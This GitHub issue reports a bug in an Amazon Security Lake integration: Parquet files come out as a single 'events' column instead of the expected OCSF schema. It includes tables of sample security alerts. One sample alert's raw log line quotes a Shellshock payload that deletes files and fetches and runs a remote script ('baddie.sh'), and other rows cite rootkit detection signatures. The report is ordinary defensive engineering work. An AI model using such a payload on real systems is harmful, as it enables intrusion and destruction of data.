Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bad Parquet format on Amazon Security Lake integration #214

Closed
AlexRuiz7 opened this issue Apr 25, 2024 · 0 comments · Fixed by #217
Closed

Bad Parquet format on Amazon Security Lake integration #214

AlexRuiz7 opened this issue Apr 25, 2024 · 0 comments · Fixed by #217
Assignees
Labels
level/task Task issue type/bug Bug issue

Comments

@AlexRuiz7
Copy link
Member

AlexRuiz7 commented Apr 25, 2024

Description

During an unscheduled internal testing of the Amazon Security Lake integration, I've detected that the Parquet file are being saved using an incorrect parquet format, having only 1 column for all the events.

This bug was probably introduced in #189.

The expected format looks like this:

+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
|   activity_id | category_name   |   category_uid | class_name        |   class_uid |   count | message                   | finding_info                                                                                                                                                                                                                                                                                                                                                                                                                           | metadata                                                                                                                                                | raw_data                                                                                                                                                                                                                | resources                                |   risk_score |   severity_id |   status_id | time                         |   type_uid | unmapped                                                                            |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
|             1 | Findings        |              2 | Detection Finding |        2004 |       1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] |            6 |             6 |          99 | 2024-02-08T11:35:14.334-0300 |     200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
|               |                 |                |                   |             |         |                           |                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                                                                                                                                         |                                                                                                                                                                                                                         |                                          |              |               |             |                              |            |        'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)}       |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+

Originally posted in #145 (comment)

The Parquet files currently use this format (not good):

+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| events                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 1, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80791'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/crond', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/crond', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Ubuntu', 'uid': '004'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:20:46.976+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                             |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 1, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80790'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/bash', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/bash', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Debian', 'uid': '007'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:22:03.034+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                               |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 0, 'finding_info': {'analytic': {'category': 'ciscat', 'name': 'N/A', 'type_id': 1, 'uid': '1740'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Sample alert 1', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Sample alert 1', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Windows', 'uid': '006'}], dtype=object), 'risk_score': 9, 'severity_id': 3, 'status_id': 99, 'time': '2024-04-22T14:22:08.087+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                                                                             |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 11, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80784'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/id', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/id', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Centos', 'uid': '005'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:21:42.780+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                                  |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 369, 'finding_info': {'analytic': {'category': 'vulnerability-detector', 'name': 'json', 'type_id': 1, 'uid': '23504'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'CVE-2019-1010204 affects binutils', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'CVE-2019-1010204 affects binutils', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'RHEL7', 'uid': '001'}], dtype=object), 'risk_score': 7, 'severity_id': 2, 'status_id': 99, 'time': '2024-04-22T14:23:28.987+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['vulnerability-detector', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                               |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 4, 'finding_info': {'analytic': {'category': 'wazuh, rootcheck', 'name': 'rootcheck', 'type_id': 1, 'uid': '510'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Host-based anomaly detection event (rootcheck).', 'types': array(['log'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Host-based anomaly detection event (rootcheck).', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': "Rootkit 'Slapper' detected by the presence of file '/tmp/.font-unix/.cinik'.", 'resources': array([{'name': 'Centos', 'uid': '005'}], dtype=object), 'risk_score': 7, 'severity_id': 2, 'status_id': 99, 'time': '2024-04-22T14:20:41.931+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['rootcheck', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                        |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 13, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80784'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/hostname', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/hostname', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'RHEL7', 'uid': '001'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:24:55.045+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                       |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 1, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80790'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/bash', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/bash', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Ubuntu', 'uid': '004'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:24:44.879+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                               |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 3, 'finding_info': {'analytic': {'category': 'wazuh, rootcheck', 'name': 'rootcheck', 'type_id': 1, 'uid': '510'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Host-based anomaly detection event (rootcheck).', 'types': array(['log'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Host-based anomaly detection event (rootcheck).', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': "Trojaned version of file '/usr/bin/fuser' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[a-dtz]|^/bin/.*sh' (Generic).", 'resources': array([{'name': 'RHEL7', 'uid': '001'}], dtype=object), 'risk_score': 7, 'severity_id': 2, 'status_id': 99, 'time': '2024-04-22T14:25:00.128+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['rootcheck', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}} |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 6, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80784'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/ls', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/ls', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Windows', 'uid': '006'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:24:49.960+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                                  |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Looks like the table has been pivoted.

@AlexRuiz7 AlexRuiz7 added level/task Task issue type/bug Bug issue labels Apr 25, 2024
@AlexRuiz7 AlexRuiz7 self-assigned this Apr 25, 2024
@AlexRuiz7 AlexRuiz7 changed the title Bad format on Parquet file for the Amazon Security Lake integration Bad Parquet fileformat on Amazon Security Lake integration Parquet files Apr 25, 2024
@AlexRuiz7 AlexRuiz7 changed the title Bad Parquet fileformat on Amazon Security Lake integration Parquet files Bad Parquet format on Amazon Security Lake integration Apr 25, 2024
@AlexRuiz7 AlexRuiz7 mentioned this issue Apr 26, 2024
8 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
level/task Task issue type/bug Bug issue
Projects
No open projects
Status: Done
Development

Successfully merging a pull request may close this issue.

1 participant